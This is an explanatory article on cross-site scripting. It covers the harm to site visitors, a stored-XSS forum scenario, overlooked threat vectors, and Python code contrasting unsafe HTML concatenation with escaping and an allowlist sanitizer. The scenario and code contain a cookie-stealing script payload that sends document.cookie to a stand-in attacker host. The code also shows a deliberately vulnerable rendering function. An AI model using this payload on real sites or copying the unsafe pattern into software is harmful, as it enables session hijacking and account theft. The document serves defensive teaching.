Although an XSS attack doesn't inflict direct harm on the website owner, it can have dire consequences for visitors to a compromised site. It can lead to:
- Redirects to unsecured, malicious sites
- Browsers crashing completely
- Active cookie and login data theft
- Account and credential compromise
- Fraudulent activity using stolen information
To understand how dangerous XSS flaws can be, let's look at a hypothetical example:
- A hacker discovers a website forum that displays user comments without any output encoding or validation.
- The attacker covertly injects a script like <script>window.location='http://hackersite.com?cookie='+document.cookie</script> into an otherwise innocuous-looking comment.
- Now whenever any user loads the page with this comment, the script will execute and send their session cookie to the hacker's server.
- By accessing the session cookie, the hacker can hijack the victim's account on the web application.
- The attacker could go on to post more comments with malicious scripts and exploit more users.
Overlooked Threat Vectors
The key enabler of XSS attacks is the poor handling of untrusted data in a web application. Unfortunately, many companies fail to recognize or prioritize certain vulnerabilities:
- Legacy web apps - Older web applications were often built without security in mind and may be prone to XSS injection without their owners realizing it.
- Rich text/HTML editors - Features allowing custom fonts, embedded media, etc. often do not validate pasted input properly, making them easy to exploit.
- Third-party integrations - Connecting apps via APIs or plugins creates additional data flows that need validation. Unsupervised use and lack of testing mean these integrations can be quickly and easily compromised.
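The forum scenario above and the rich-text-editor point both come down to how comment text reaches the page. The following Python is an added example, not code from the article: it contrasts the vulnerable raw-concatenation pattern with output encoding for plain-text comments, and adds a small hypothetical allowlist sanitizer for comments that are permitted to carry limited HTML (only <b>, <i>, and http(s) links survive; script bodies and unknown tags are dropped). The comment payload is the one from the article's scenario, embedded here as constructed sample input.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample input: the stored-XSS payload from the forum scenario.
COMMENT = ("Nice post! <script>window.location='http://hackersite.com?cookie='"
           "+document.cookie</script>")

def render_unsafe(comment: str) -> str:
    """Vulnerable pattern: untrusted text is concatenated straight into HTML."""
    return f'<li class="comment">{comment}</li>'

def render_escaped(comment: str) -> str:
    """Hardened plain-text rendering: encode for the HTML text context."""
    return f'<li class="comment">{html.escape(comment, quote=True)}</li>'

class AllowlistSanitizer(HTMLParser):
    """Hypothetical minimal allowlist sanitizer for rich-text comments."""
    ALLOWED = {"b", "i", "a"}
    DROP_BODY = {"script", "style"}  # tags whose inner text is discarded too

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.drop = [], 0

    def handle_starttag(self, tag, attrs):
        if tag in self.DROP_BODY:
            self.drop += 1
            return
        if tag not in self.ALLOWED:
            return  # unknown tag removed; its text still flows through handle_data
        if tag == "a":
            href = dict(attrs).get("href") or ""
            if urlparse(href).scheme not in ("http", "https"):
                self.out.append("<a>")  # strips javascript:, data:, vbscript: links
                return
            self.out.append(f'<a href="{html.escape(href, quote=True)}" rel="noopener">')
        else:
            self.out.append(f"<{tag}>")

    def handle_endtag(self, tag):
        if tag in self.DROP_BODY:
            self.drop = max(0, self.drop - 1)
        elif tag in self.ALLOWED:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.drop:
            self.out.append(html.escape(data, quote=True))  # re-encode all text

def sanitize_rich(comment: str) -> str:
    p = AllowlistSanitizer()
    p.feed(comment)
    p.close()
    return "".join(p.out)
```

Encoding must match the output context: html.escape covers the text and quoted-attribute contexts shown here, but a value placed inside a URL or a script block needs its own encoder.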